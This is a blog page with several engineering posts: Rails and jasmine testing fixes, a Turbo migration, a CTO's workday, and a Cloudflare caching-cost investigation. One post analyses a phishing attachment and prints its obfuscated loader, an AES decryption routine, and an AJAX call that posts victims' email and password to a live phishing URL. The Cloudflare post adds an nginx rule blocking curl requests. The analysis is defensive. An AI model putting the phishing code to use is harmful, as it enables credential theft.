Recent Updates Toggle Comment Threads | Keyboard Shortcuts

  • kmitov 11:30 am on November 26, 2021 Permalink |
    Tags: apple, payment   

    Unsettled: The Future of Apple’s 30% Cut (by Fastspring) 

    I tried to do a quick summary in our team about what is coming from the Epic vs Apple case. After looking at a few different resources I think the following webinar gives a good understand of what is happening

    (source https://fastspring.wistia.com/medias/tutvwsihof)

    Current status summary

    1. There is a new possible “Web flow” that opens a lot of possibilities that previously were note possible.
    2. You are more flexible to target users in specific ways
    3. We have an unlock Optimization for customer lifetime value – Retention, Cross sell
    4. The future might be – enter the app ecosystem and then use web flow outside of Apple for cross sell, sell, communication.
    5. There might be less “Paid” app going forward. There will be a move to “Subscription”
    6. It is more likely for change to come from Regulatory and Government efforts than from Court rulings
     
  • kmitov 7:16 am on November 16, 2021 Permalink |
    Tags:   

    How they tried to compromise our CEO and what a phishing email contains 

    Are you curious about what is inside those phishing emails and how they try to steal your password?

    This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.

    A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.

    Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.

    Content of phishing email

    This is the email. It has an attachment. Looks kind of real.

    This is how the attachment looks like:

    What could you do:

    1. Check the sender
    2. Ask your CTO/Admin/Security or somebody with good technical knowledge whether this email is ligit.
    3. Don’t click on attachments

    The attachment is an HTM file

    This file is executable on Microsoft Windows machines. Lets see the content of this file if you open it with a text editor:

    A sample of it is:

    <script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>

    This file contains an HTML document. HTML is the format of webpages and once you click on this file it will open your web browser and the web browser will execute this file.

    Note: Don’t click on such attachments.

    What is unescape?

    This unescape here means that the string

    “‘%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..” is encoded.

    ‘unescape’ is a function that changes the encoding. It is technical, but at the end the goal is to make sure this file could be read by all browsers.

    The result of unescaping the content looks like:

    <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
      <script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
      <script>
      function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
          var obj_json = JSON.parse(encrypted_json_string);
          var encrypted = obj_json.ciphertext;
          var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
          var iv = CryptoJS.enc.Hex.parse(obj_json.iv);   
          var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
          var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
          return decrypted.toString(CryptoJS.enc.Utf8);
      }
      document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE

    Here is what happens in the code in simple terms:

    There is an encrypted text called “ciphertext” and this cipher text is decrypted and execute. This happens on the last line of the fragment above.

    So the phishing main contains an attachment, this attachment is ‘escaped’ and the ‘escaped’ content is encrypted.

    What’s the content of the ciphertext?

    The cipher text contains a web page that you browser will visualize. It looks like a real web page. It looks like a real Microsoft 365 page.

    Here is a screenshot:

    Here where you see “pesho@gmail.com” you will see your personal email.
    This makes the page look more real to you.

    The summary for now – the phishing email contains an attachment, that has an executable HTML code that is escaped, that is also encrypted, and the encrypted content contains an HTML page that looks like Microsoft login page.

    What happens when you fill your email and password?

    There is a fragment of the code of the page that looks like this:

    count=count+1
      $.ajax({
        dataType: 'JSON',
        url: 'https://sintracoopmn.com.br/process.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
          detail:detail,
    
        },

    This code will send you email and password to the following webaddress https://sintracoopmn.com.br/process.php

    Let’s try it.

    I add the username pesho@gmail.com with password ‘abcd1234’

    Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but will also log me in my Office 365 account.

    So I will not even understand that I was compromised.

    What can you do?

    Add a two factor authentication.

    That’s the easiest, most secure solution. Add a two factor authentication that will send you an SMS every time you login or will require you to use an authenticator app.

    If you haven’t done it already, I would advice you to do it now.

     
  • kmitov 7:13 am on November 10, 2021 Permalink |
    Tags: , , , , ,   

    Migrating to jasmine 2.9.1 from 2.3.4 for teaspoon 

    We finally decided it is probably time to try to migrate to jasmine 2.9.1 from 2.3.4

    There is an error that started occurring randomly and before digging down and investigating it and and the end finding out that it is probably a result of a wrong version, we decided to try to get up to date with jasmine.

    Latest jasmine version is 3.X, but 2.9.1 is a huge step from 2.3.4

    We will try to migrate to 2.9.1 first. The issue is that the moment we migrated there is an error

    'beforeEach' should only be used in 'describe' function

    It took a couple of minutes, but what we found out is that fixtures are used in different ways.

    Here is the difference and what should be done.

    jasmine 2.3.4

    fixture.set could be in the beforeEach and in the describe

    // This works
    // fixture.set is in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);
      beforeEach(function() {
      })
    })
    // This works
    // fixture.set is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })

    jasmine 2.9.1

    fixture.set could be only in the describe and not in the before beforeEach

    // This does not work as the fixture is in the beforeEach
    describe("feature 1", function() {
      beforeEach(function() {
        fixture.set(`<div id="the-div"></div>`);
      })
    })
    // This does work
    // fixture.set could be only in the describe
    describe("feature 1", function() {
      fixture.set(`<div id="the-div"></div>`);  
      beforeEach(function() {
        
      })
    })
     
  • kmitov 8:57 am on October 8, 2021 Permalink |
    Tags: amazon-s3, ,   

    Sometimes you need automated test on production 

    In this article I am making the case that sometimes you just need to run automated tests against the real production and the real systems with real data for real users.

    The case

    We have a feature on one of our platforms:

    1. User clicks on “Export” for a “record”
    2. A job is scheduled. It generates a CSV file with information about the record and uploads on S3. Then a presigned_url for 72 hours is generated and an email is sent to the user with a link to download the file.

    The question is how do you test this?

    Confidence

    When it comes to specs I like to develop automated specs that give me the confidence that I deliver quality software. I am not particularly religious to what the spec is as long as it gives me confidence and it is not standing in my way by being too fragile.

    Sometimes these specs are model/unit specs, many times they are system/feature/integration specs, but there are cases where you just need to run a test on production against the production db, production S3, production env, production user, production everything.

    Go in a System/Integration spec

    A spec that would give me confidence here is to simulate the user behavior with Rails system specs.
    The user goes and click on the Export and I check that we’ve received an email and this email contains a link

      scenario "create an export, uploads it on s3 and send an email" do
        # Set up the record
        user = FactoryBot.create(:user)
        record = FactoryBot.create(:record)
        ... 
    
        # Start the spec
        login_as user
        visit "/records"
        click_on "Export"
        expect(page).to have_text "Export successfully scheduled. You will receive an email with a link soon."
    
        mail_html_content = ActionMailer::Base.deliveries.select{|email| email.subject == "Successful export"}.last.html_part.to_s
        expect(mail_html_content).to have_xpath "//a[text()='#{export_name}']"
        link_to_exported_zip = Nokogiri::HTML(mail_html_content).xpath("//a[text()='#{export_name}']").attribute("href").value
    
        csv_content = read_csv_in_zip_given_my_link link_to_exported_zip 
        expect(csv_content).not_to be_nil
        expect(csv_content).to include user.username
      end

    This spec does not work!

    First problem – AWS was stubbed

    We have a lot of other specs that are using S3 API. It is a good practice as you don’t want all your specs to touch S3 for real. It is slow and it is too coupled. But for this spec there was a problem. There was a file uploaded on S3, but the file was empty. The reason was that on one of the machines that was running the spes there was no ‘zip’ command. It was not installed and we are using ‘zip’ to create a zip of the csv files.

    Because of this I wanted to upload an actual file somehow and actually check what is in the file.

    I created a spec filter that would start a specific spec with real S3.

    # spec/rails_helper.rb
    RSpec.configure do |config|
      config.before(:each) do
        # Stub S3 for all specs
        Aws.config[:s3] = {
          stub_responses: true
        }
      end
    
      config.before(:each, s3_stub_responses: false) do
        # but for some specs, those that have "s3_stub_responses: false" tag do not stub s3 and call the real s3.
        Aws.config[:s3] = {
          stub_responses: false
        }
      end
    end

    `This allows us to start the spec

      scenario "create an export, uploads it on s3 and send an email", s3_stub_responses: false do
        # No in this spec S3 is not stubbed and we upload the file
      end

    Yes, we could create a local s3 server, but then the second problem comes.

    Mailer was adding invalid params

    In the email we are sending a presigned_url to the S3 file as the file is not public.
    But the mailer that we were using was adding “utm_campaign=…” to the url params.
    This means that the S3 presigned url was not valid. Checking if there is an url in the email was simply not enough. We had to actually download the file from S3 to make sure the link is correct.

    This was still not enough.

    It is still not working on production

    All the tests were passing with real S3 and real mailer in test and development env, but when I went on production the feature was not working.

    The problem was with the configuration. In order to upload to S3 we should know the bucket. The bucket was configured for Test and Development but was missing for production

    config/environments/development.rb:  config.aws_bucket = 'the-bucket'
    config/environments/test.rb:  config.aws_bucket = 'the-bucket'
    config/environments/production.rb: # there was no config.aws_bucket

    The only way I could make sure that the configuration in production is correct and that the bucket is set up correctly is to run the spec on a real production.

    Should we run all specs on a real production?

    Of course not. But there should be a few specs for a few features that should test that the buckets have the right permissions and they are accessible and the configuration in production is right. This is what I’ve added. Once a day a spec goes on the production and tests that everything works on production with real S3, real db, real env and configuration, the same way that users will use the feature.

    How is this part of the CI/CD?

    It is not. We do not run this spec before deploy. We run all the other specs before deploy that gives us 99% confidence that everything works. But for the one percent we run a spec once every day (or after deploy) just to check a real, complex scenario, involving the communication between different systems.

    It pays off.

     
  • kmitov 7:33 am on October 8, 2021 Permalink |
    Tags: hotwire, , , turbo   

    [Rails, Hotwire] Migrate to Turbo from rails-ujs and turbolinks – how it went for us. 

    We recently decided to migrate one of our newest platforms to Turbo. The goal of this article is to help anyone who plans to do the same migration. I hope it gives you a perspective of the amount of work required. Generally it was easy and straightforward, but a few specs had to be changed because of urls and controller results

    Gemfile

    Remove turbolinks and add turbo-rails. The change was

    --- a/Gemfile.lock
    +++ b/Gemfile.lock
    @@ -227,9 +227,8 @@ GEM
         switch_user (1.5.4)
         thor (1.1.0)
         tilt (2.0.10)
    -    turbolinks (5.2.1)
    -      turbolinks-source (~> 5.2)
    -    turbolinks-source (5.2.0)
    +    turbo-rails (0.7.8)
    +      rails (>= 6.0.0)

    application.js and no more rails-ujs and Turbolinks

    Added “@notwired/turbo-rails” and removed Rails.start() and Turbolinks.start()

    --- a/app/javascript/packs/application.js
    +++ b/app/javascript/packs/application.js
    @@ -3,8 +3,7 @@
     // a relevant structure within app/javascript and only use these pack files to reference
     // that code so it'll be compiled.
    
    -import Rails from "@rails/ujs"
    -import Turbolinks from "turbolinks"
    +import "@hotwired/turbo-rails"
     import * as ActiveStorage from "@rails/activestorage"
     import "channels"
    
    @@ -14,8 +13,6 @@ import "channels"
     // Collapse - needed for navbar
     import { Collapse } from 'bootstrap';
    
    -Rails.start()
    -Turbolinks.start()
     ActiveStorage.start()

    package.json

    The change was small

    --- a/package.json
    +++ b/package.json
    @@ -2,10 +2,10 @@
       "name": "platform",
       "private": true,
       "dependencies": {
    +    "@hotwired/turbo-rails": "^7.0.0-rc.3",
         "@popperjs/core": "^2.9.2",
         "@rails/actioncable": "^6.0.0",
         "@rails/activestorage": "^6.0.0",
    -    "@rails/ujs": "^6.0.0",
         "@rails/webpacker": "5.4.0",
         "bootstrap": "^5.0.2",
         "stimulus": "^2.0.0",

    Device still does not work

    For the device forms you have to add “data: {turbo: ‘false’}” to disable turbo for them

    +<%= form_for(resource, as: resource_name, url: password_path(resource_name), html: { method: :post }, data: {turbo: "false"}) do |f| %>;

    We are waiting for resolutions on https://github.com/heartcombo/devise/pull/5340

    Controllers have to return an unprocessable_entity on form errors

    If there are active_record.errors in the controller we must now return status: :unprocessable_entity

    +++ b/app/controllers/records_controller.rb
    @@ -14,7 +14,7 @@ class RecordsController < ApplicationController
         if @record.save
           redirect_to edit_record_path(@record)
         else
    -      render :new
    +      render :new, status: :unprocessable_entity
         end
       end

    application.js was reduced significantly

    The old application.js – 923 KiB

      application (932 KiB)
          js/application-dce2ae8c3797246e3c4b.js

    The new application.js – 248 KiB

    remote:        Assets: 
    remote:          js/application-b52f4ecd1b3d48f2f393.js (248 KiB)

    Conclusion

    Overall a good experience. We are still facing some minor issues with third party chat widgets like tawk.to that do not work well with turbo, as they are sending 1 more request, refreshing the page and adding the widget to an iframe that is lost with turbo navigation. But we would probably move away from tawk.to.

     
  • kmitov 6:29 am on October 8, 2021 Permalink |
    Tags: , , ,   

    [Rails] Warden.test_reset! does not always reset and the user is still logged in 

    We had this strange case of a spec that was randomly failing

      scenario "generate a subscribe link for not logged in users" js: true do 
        visit "/page_url"
    
        expect(page).to have_xpath "//a[text()='Subscribe']"
        click_link "Subscribe"
        ...
      end 

    When a user is logged in we generate a button that subscribes them immediately. But when a user is not logged in we generate a link that will direct the users to the subscription page for them to learn more about the subscription.

    This works well, but the spec is randomly failing sometimes.

    We expect there to be a link, eg. “//a” but on the page there is actually a button, eg. “//button”

    What this means is that when the spec started there was a logged in user. The user was still not logged out from the previous spec.
    This explains why sometimes the spec fails and why not – because we are running all the specs with a random order

    $ RAILS_ENV=test rake spec SPEC='...' SPEC_OPTS='--order random'

    Warden.test_reset! is not always working

    There is a Warden.test_reset! that is supposed to reset the session, but it seems for js: true cases where we have a Selenium driver the user is not always reset before the next test starts.

    # spec/rails_helper.rb
    RSpec.configure do |config|
      ...
      config.after(:each, type: :system) do
        Warden.test_reset!
      end
    end

    Logout before each system spec that is js: true

    I decided to try to explicitly log out before each js: true spec that is ‘system’ so I improved the RSpec.configuration

    RSpec.configure do |config|
      config.before(:each, type: :system, js: true) do
        logout # NOTE Sometimes when we have a js spec the user is still logged in from the previous one
        # Here I am logging it out explicitly. For js it seems Warden.test_reset! is not enough
        #
        # When I run specs without this logout are
        # Finished in 3 minutes 53.7 seconds (files took 28.79 seconds to load)
        #   383 examples, 0 failures, 2 pending
        #
        # With the logout are
        #
        # Finished in 3 minutes 34.2 seconds (files took 21.15 seconds to load)
        #   383 examples, 0 failures, 2 pending
        #
        # Randomized with seed 26106
        # 
        # So we should not be losing on performance
      end
    end

    Conclusion

    Warden.test_reset! does not always logout the user successfully before the next spec when specs are with Selenium driver – eg. “js: true”. I don’t know why, but that is the observed behavior.
    I’ve added a call to “logout” before each system spec that is js: true  to make sure the user is logged out.

     
  • kmitov 9:00 am on October 5, 2021 Permalink |
    Tags:   

    A day of the life of a CTO – “what do you do, day to day?” 

    My brother asked me the other day:

    He: – So what do you do, day to day?

    Me: – I work in engineering (software, data and AI).

    It’s a little bit more than that. Not all the days are the same. There are a lot of decisions to be made, and generally with a little luck those decisions will keep the ship at least in the right direction.

    I decided to look deeper and to record. There is a difference between what we think we are doing and what we are actually doing. I tried to summarize just one of my recent days that I spent in engineering. This was a day without any software development for me.

    My hope with this article is to be able to answer my brother – “What do you do, day to day?” and I hope this answer and examples could be interesting to people entering the world of Software engineering and to business and product people trying to learn more about how their engineers spend their day.

    Adding a JSONB column to a scheme

    A colleague was facing the issue of storing an array of values in a DB. The values were the result of calling the API of an external service for our business.

    How do you store these values? There are many different ways. I supported his recommendation to store the data as JSON format. I only suggested changing the type of the column to JSONB as this will later allow us to query the table in an easier way. At the same time I had to re-think part of the stack to see if there would be any implications on the whole platform when this new column JSONB is introduced. Luckily there were no implications.

    Automated test that we create a table

    A colleague was working on a pipeline and the specs for this pipeline. The question was how do we build a spec for part of the logic. The logic creates a new table. How do we test this in an automated way? How do we test that this logic creates a db? We considered two different approaches and together we looked for a good API call to test this.

    We decided on how to spec this behavior.

    DateTime field

    A colleague was facing the issue with date in the data platform that had invalid values. The issue was that we were storing both the date and the time for an event where we should have been storing only the time. The implications were huge. We now had to migrate all the values in all the records.

    In this case we looked at the product requirements on what should be included in the data platform in the near future. Turns out that there is a requirement for engineering to store not only the time, but also the date of the event. This means there was nothing to fix as we were ahead of time in engineering. We only have to migrate a couple of records.

    The decision here was whether we should spend a day migrating this data and what would be the issue if the data was not migrated.

    Choose a service $50/80GB

    A colleague had the task to look at different services that we could use. We had to make a decision should we use this $50 service or that $50 service. The decision is important because once you decide on a service to add in your stack it is difficult to move out of this service. You kind of stay with them at least for the near future.

    Sometimes when you look at two services on your own you can overlook a few of the aspects so it is a good practice to have a second look from someone else. Also at the end it is a team decision of what to include in the stack.

    Integration with an external API

    A colleague was working on integrating with an external API. The issue was the this API is returning different formats for different calls. The question was how do we handle this. Should we hard code the scheme for this API, should we infer it, should we do something smarter? How does this impact the abstraction for the other Data Sources. We had to get on a call with the external API representatives to discuss if they could help us.

    Creating new repos

    A colleague was working on new features in the platform. These new feature should be extracted into new repositories. We had to decide on the name of the repositories. In the world of software development there are two hard things – invalidating cache and naming. Naming is important because it gives you power over things. Once you name them you have power over them. If you name them bad, then they have power over you. Nevertheless, we had to make a decision on how we name two new code repositories.

    Abilities

    A colleague was working on the authorization part of the platform. We are adding new authorizations based on roles. He developed the code and was ready for a Code review. I was there and decided to jump on the Code Review. The issue with the implementation was that it was coupling the authorization with all the modules in a single class. Coupling is bad in the long run as it is not very agile and difficult to maintain. We spent time decoupling the implementation.

    System vs model specs

    A colleague was in the middle of developing an automated spec. There are generally two types of specs – integration and unit. In our case we use “system” and “model” specs. System specs test the behavior of the whole feature. Unit specs test the behavior of a specific unit (class, function). My general rule of thumb is – 10% system specs, 90% model specs, but start with the system spec. I’ve been in situations with too many system specs which make the system unmaintainable and require us to invest a lot of time in refactoring. Since then I am cautious about what kind of spec are developed, when and why. We revised current assumptions and decided if current specs should be developed as a system or unit.

    Flash messages

    A colleague was working on some flash messages on the platform that are appearing at a specific moment. I took a look and confirmed the implementation and the behavior.

    Constructing new objects

    A colleague was working on refactoring part of the code. A general rule of thumb I try to follow is “always construct instances of a given type” only at one specific place in the code. We revised the implementation and saw that there are a few places where instances of a given type were constructed. There is an easy solution for this. We schedule it for the following week to be implemented.

    Submit button change type to input

    A colleague was working on a feature on the web platform and noticed that a few of the forms had the wrong type of button. I was around and I was the one to previously commit this form so he notified me about the change and we discussed the implications.

    Structure of blob storage

    A colleague was working on an integration with an API that will store information in our BigData Lake. We had to sync the structure of the lake and how it will accommodate the new API.

    Infrastructure from code

    A colleague was working on deploying on a cloud provider. We try to create our infrastructure from code. It is way too easy to set up an infrastructure, spend a week deploying it, and then be unable to reproduce it later on because of the gazillion different options and little configurations you have to do on the cloud providers. Just ask anyone who has configured AWS IAM permissions and resources.

    It is important to have a script that would create your infrastructure from code. We had to revise, review and think about the implications of the resources that the code creates.

    Conclusion

    No actual conclusion. This is just a diary of the day. I hope that my brother along with many others now understand more about our work.

     
  • kmitov 4:30 am on September 8, 2021 Permalink |
    Tags: airflow, apache, bigdata   

    Orchestration of BigData with Apache Airflow 

    It was a please for me to do this presentation and discuss how we can orchestrate BigData with Apache Airflow at the 2021 OpenFest event

    Video is in Bulgarian

     
  • kmitov 5:48 am on September 6, 2021 Permalink |
    Tags: , , , ,   

    Refresh while waiting with RSpec+Capybara in a Rails project 

    This is some serious advanced stuff here. You should share it.

    A colleague, looking at the git logs

    I recently had to create a spec with Capybary+RSpec where I refresh the page and wait for a value to appear on this page. It this particular scenario there is no need for WebSockets or and JS. We just need to refresh the page.

    But how to we test it?

    # Expect that the new records page will show the correct value of the record
    # We must do this in a loop as we are constantly refreshing the page.
    # We need to stay here and refresh the page
    # 
    # Use the Tmeout.timeout to stop the execution after the default Capybara.default_max_wait_time
    Timeout.timeout(Capybara.default_max_wait_time) do
      loop do
        # Visit the page. If you visit the same page a second time
        # it will refresh the page.
        visit "/records"
        # The smart thing here is the wait: 0 param
        # By default find_all will wait for Capybara.default_max_wait_time as it is waiting for all JS methods 
        # to complete. But there is no JS to complete and we want to check the page as is, without waiting 
        # for any JS, because there is no JS. 
        # 
        # We pase a "wait: 0" which will check and return
        break if find_all(:xpath, "//a[@href='/records/#{record.to_param}' and text()='Continue']", wait: 0).any?
    
        # If we could not find our record we sleep for 0.25 seconds and try again.
        sleep 0.25
      end
    end

    I hope it is helpful.

    Want to keep it touch – find me on LinkedIn or Twitter.

     
  • kmitov 10:49 am on September 3, 2021 Permalink |
    Tags: aws, cloudflare, nginx,   

    When the policeman becomes the criminal – how Cloudflare attacks my machines. 

    On the Internet you are nobody until someone attacks you.

    It gets even more interesting when the attack comes from someone with practically unlimited resources and when these are the same people that are supposed to protect you.

    This article is the story of how Cloudflare started an “attack” on a machine at the FLLCasts platform. This increased the traffic of the machine about 10x and AWS started charging the account 10x more. I managed to stop them and I hope my experience is useful for all CTOs, sysadmins, devops and others that would like to understand more and look out for such cases.

    TL; DR;

    Current up to date status is – after all the investigation it turns out that when a client makes a HEAD request for a file this will hit Cloudflare infrastructure. Cloudflare will then send a GET request to the account machine and will cache the file. This has changed at 28 of August. Before 28 of August when clients were sending HEAD requests, Cloudflare was sending HEAD requests (that don’t generate traffic). After 28 of August clients are still sending HEAD requests, but now Cloudflare is sending GET requests, generating terabytes of additional traffic that is not needed.

    Increase of the Bill

    On 28 of August 2021 I got a notification from AWS that the account is close to surpassing its budget for the month. This is not surprising as it was the end of the month, but nevertheless I decided to check. It seems that the traffic to one of the machines has increased 10x in a day. Nothing else has increased. No visits, no other resources, just the traffic to this one particular machine. 
    That was strange. This has been going on for 7 days now and this is the increase of the traffic.

    AWS increase of the bill

    Limit billing on AWS

    First thought was “How can I set a global limit to AWS spending for this account? I don’t want to wake up with $50K in traffic charges the next day?”

    The answer is “You can’t”. There is no way to set a global spending limit for an AWS account. This was something I already knew, but decided to check again with support and yes, you can’t set such a limit. This means that AWS is providing all the tools for you to be bankrupt by a third party and they are not willing to limit it.

    Limit billing on Digital Ocean

    I have some machines on Digital Ocean and I checked there. “Can I set a global spending limit for my account where I will no longer be charged and all my services will stop if my spending is above X amount of dollars?”.
    The answer was again – “No. Digital ocean does not provide it”.

    Should there be a global limit on spending on cloud providers?

    My understanding is – yes. There is a break even point where users are coming to your service and generating revenue and you are delivering the service and this is costing you money. Once it costs you more to deliver the service than the revenue that the service is generating, I would personally prefer to stop the service. No need for it to be running. Otherwize you could wake up with a $50K bill.

    AWS monitoring

    I had the bill from AWS so I tried looking at the monitoring.
    There is a spike every day between 03:00 AM UTC and 05:00 AM UTC. This spike is increasing the traffic with hundreds of gigabytes. It could easily be terabytes next time.
    The conclusion is that the machine is heavily loaded during this time.

    AWS monitoring

    Nginx access.log

    Looking at the access log I see that there are a lot of requests by machines that are using a user agent called ‘curl’. ‘curl’ is a popular tool for accessing files over HTTP and is heavily used by different bots. But bots tend to identify themselves.

    This is how the access.log looks like:

    172.68.65.227 - - [30/Aug/2021:03:26:02 +0000] "GET /f9a13214d1d16a7fb2ebc0dce9ee496e/file1.webm HTTP/1.1" 200 27755976 "-" "curl/7.58.0"

    Parsing the log file

    I have my years in bash experience and couple of commands later I get a list of all the IPs and how many requests we’ve received from these IPs.

    grep curl access.log | cut -d ' ' -f 1 | sort | uniq -c | sort -n

    The result is 547 machines. The full log file is available at – Full list of Cloudflare IPs attacking my machine. The top 20 are (there are some IPs that are not from Cloudflare). The first is the number of requests, the second is the IP of the machine.  

    NumberOfRequest IP
        113 172.69.63.18
        117 172.68.65.107
        150 172.70.42.135
        158 172.70.42.161
        164 172.69.63.82
        167 172.70.42.129
        169 172.69.63.116
        170 172.68.65.231
        173 172.68.65.101
        178 172.69.63.16
        178 172.70.42.143
        188 173.245.54.236
        264 172.70.134.69
        268 172.70.134.117
        269 172.70.134.45
        287 172.70.134.153
        844 172.70.34.131
        866 172.70.34.19
        904 172.70.34.61
        912 172.70.34.69

    These are Cloudflare machines!

    Looking at the machines that are making the requests these are 547 different machines, most of which are Cloudflare machines. These are servers that Cloudflare seems to be running that are making the request.

    How does Cloudflare work?

    For this particular FLLCasts account with this particular machine I have years ago setup Cloudflare to sit in front of the machine to help  protect the account from internet attacks.

    The way Cloudflare works is that only Cloudflare knows what is the IP address of our machine. This is the promise that Cloudflare is making. Because only they know the IP address of the machine, only they know what is the IP address for a given domain. In this way when a user points their browser at the “http://domainname&#8221; the internet will direct this request to Cloudflare, then Cloudflare will check if this request is ok, and then and only then forward this request to our machine. But in the meantime Cloudflare is trying to help businesses like the platform by caching the content. This means that when Cloudflare receives a request for a file, they will check on their Cloudflare infrastructure if this file was cached and send a request to the account machine only if there is no cache.

    In a nutshell Cloudflare maintains a cache for the content the platform is delivering.

    Image is from Cloudflare support at https://support.cloudflare.com/hc/en-us/articles/205177068-How-does-Cloudflare-work-

    What is broken?

    Cloudflare maintains a cache of the platform resources. Every night between 03:00 AM UTC and 05:00 AM UTC some 547 Cloudflare machines decide to update their cache and they start sending requests to our server. These are 10x more requests that the machine generally receives from all users. The content on the server does not change. It’s been the same content for years. But for the last 7 days Cloudflare is caching the same content every night on 547 machines.

    And AWS bills us for this.

    Can Cloudflare help?

    I created a ticket. The response was along the lines of “You are not subscribed for our support, you can get only community support”. Fine.
    I called them on the phone early in the morning.
    I called enterprise sales and I asked them.

    Me - "Hi, I am under attack. Can you help?"
    They - "Yes, we can help. Who is attacking you?"
    Me - "Well, you are. Is there an enterprise package I could buy so that you can protect me against your attack?"

    Luckily the guy on the phone caught my sense of humor and urgency and quickly organized a meeting with a product representative. Regrettably there were no solution engineers on this call.

    Both guys were very knowledgeable, but I had difficulties explaining that it was actually Cloudflare causing the traffic increase. I had all the data from AWS, from the access.log files, but the support agents still had some difficulty accepting it.

    To be clear – I don’t think that Cloudflare is maliciously causing this. There is no point. What I think has happened is some misconfiguration on their side that caused this for the last 7 days.

    What I think has happened?

    I tried to explain to the support agents that there are three scenarios all of which Cloudflare is responsible for.

    1. Option 1 – “someone that has 547 machines is trying to attack the FLLCasts account and Cloudflare is failing to stop it”. First this is very unlikely. Nobody will invest in starting 547 machines just to make the platform pay a few dollars more this month. And even if this is the case, this is what Cloudflare should actually prevent, right? Option 1: “Cloudflare is failing in preventing attacks” (unlikely)


    2. Option 2 – “only Cloudflare knows the IP of this domain name and they have been compromised.”. The connection between domain name and ip address is something that only Cloudflare knows about. If a third party knows the domain name and they are able to find the IP name this means that they are compromising Cloudflare. Option 2: “Cloudflare is compromised” (possible, but again, unlikely)

    3. Option 3 – “there is a misconfiguration in some of the Cloudflare servers”. I don’t like looking for malicious activity where everything could be explained with simple ignorance or a mistake. Most likely there is a misconfiguration in the Cloudflare infrastructure that is causing these servers to behave in this way. Option 3: “There is a misconfiguration in Cloudflare infrastructure”

    4. Option 4 – “there is a mistake on our end”. As there basically is nothing on our end and this nothing has not changed in years, the possibility for this to be the case is minimal. 

    On a support call we set a plan with the support agents to investigate it. I will change the public IP of the AWS machine and will reconfigure it on Cloudflare. In this way we hope to stop some of the requests. We have no plan for what to do after that.

    Can I block in on the Nginx level?

    Nginx is an HTTP server,serving files. There are a couple of options to explore there, but the most reasonable was to stop all curl requests to the Nginx server. This was the shortest path. There was no need to protect against other attacks, there was only the need to protect against Cloudflare attacks. The Cloudflare attack was using “curl” as a tool. I decided to stop ‘curl’

      # Surely not the best, but the simplest and will get the job done for now.
      if ($http_user_agent ~ 'curl') {
          return 444; # Consider returning 444. It's a custom nginx code that drop the connection without responding.
      }

    Resolution

    I am now waiting to see if the change of the public IP of the AWS machine will have any impact and if not I am just rejecting all “curl” requests that seem to be what Cloudflare is using.

    Update 1

    The first solution that we decide to implement is to

    Change the public IP of the AWS machine and change it in the DNS settings at Cloudflare. In this way we would make sure that only Cloud flare really knows this IP.

    Resolution is – It did not work!

    I know it won’t, because it was another way for support to get me to do anything without really looking into the issue, but I went along with it. Better exhaust this options and be sure.

    The traffic of a Cloudflare attacked machine. Changing the IP address of 03 of September had no effect.

    Update 2

    Adding CF-Connection-IP header

    Cloudflare support was really helpful. They asked me to include CF-Connection-IP in the logs. In this way we would know what is the real IP that is making the requests and if these are in fact Cloudflare machines.

    The header is described at https://support.cloudflare.com/hc/en-us/articles/200170986-How-does-Cloudflare-handle-HTTP-Request-headers-

    I went on and updated the Nginx configuration

    log_format  cloudflare_debug     '$remote_addr - $remote_user [$time_local] "$request" '
                          '$status $body_bytes_sent "$http_referer" '
                          '"$http_user_agent" "$http_x_forwarded_for" "$http_cf_connecting_ip"';
    
    access_log /var/log/nginx/access.log cloudflare_debug;
    

    Now the log file contained the original IP.

    Cloudflare is making GET when client makes a HEAD request

    This is what I found out. The platform has a daily job that checks the machine and makes sure files are ok. This integrity check was left there from times when we had to do it, like years ago. It is still running and is starting every night checking the machine with HEAD requests. But Cloudflare started making GET request at 28 of August 2021 and this increases the traffic to the machine.

    Steps to reproduce

    Here are the steps to reproduce:

    1. I am sending a HEAD request with ‘curl -I’

    2. Cloudflare has not cached the file so there is “cf-cache-status: MISS”

    3. Cloudflare sends a GET request and gets the whole file

    4. Cloudflare responds to the HEAD request.

    5. I send a HEAD request agian with ‘curl -I’

    6. Cloudflare has the file cached and there is a “cf-cache-status: HIT”

    7. The account server is not hit.

    The problem here is that I am sending a HEAD request to my file and Cloudflare is sending a GET request for the whole file in order to cache this file

    Commands to reproduce

    This is a HEAD request:

    $ curl -I https://domain.com/file1.webm
    HTTP/2 200
    date: Sat, 04 Sep 2021 07:09:11 GMT
    content-type: video/webm
    content-length: 2256504
    last-modified: Sat, 04 Jan 2014 14:24:01 GMT
    etag: "52c81981-226e78"
    cache-control: max-age=14400
